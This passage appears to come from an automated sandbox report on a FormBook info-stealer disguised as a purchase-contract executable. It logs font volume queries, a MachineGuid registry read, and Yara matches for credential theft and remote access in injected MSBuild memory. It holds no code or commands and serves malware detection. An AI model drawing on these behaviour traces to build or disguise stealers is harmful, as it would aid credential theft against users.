Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Purchase contract #9009.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\Desktop\Purchase contract #9009.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.904866229.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.904297754.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.717327581.0000000001510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.717304583.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.668891023.00000000035D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.716913702.0000000000400000.00000040.00000001.sdmp, type: MEMORY